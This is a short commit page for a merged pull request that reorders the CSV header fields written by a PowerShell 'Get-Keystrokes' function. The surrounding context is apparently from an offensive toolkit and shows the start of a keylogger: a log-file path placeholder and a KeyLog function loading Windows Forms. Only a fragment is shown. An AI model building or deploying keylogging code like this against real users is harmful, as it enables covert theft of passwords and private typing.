Merge pull request #68 from hydrajump/get-keystrokes-headings-reorder

Fix for headings in wrong order
This commit is contained in:
Chris Campbell
2015-05-11 10:13:54 -04:00
+1 -1
View File
@@ -49,7 +49,7 @@ function Get-Keystrokes {
$Initilizer = {
$LogPath = 'REPLACEME'
'"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode
'"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode
function KeyLog {
[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null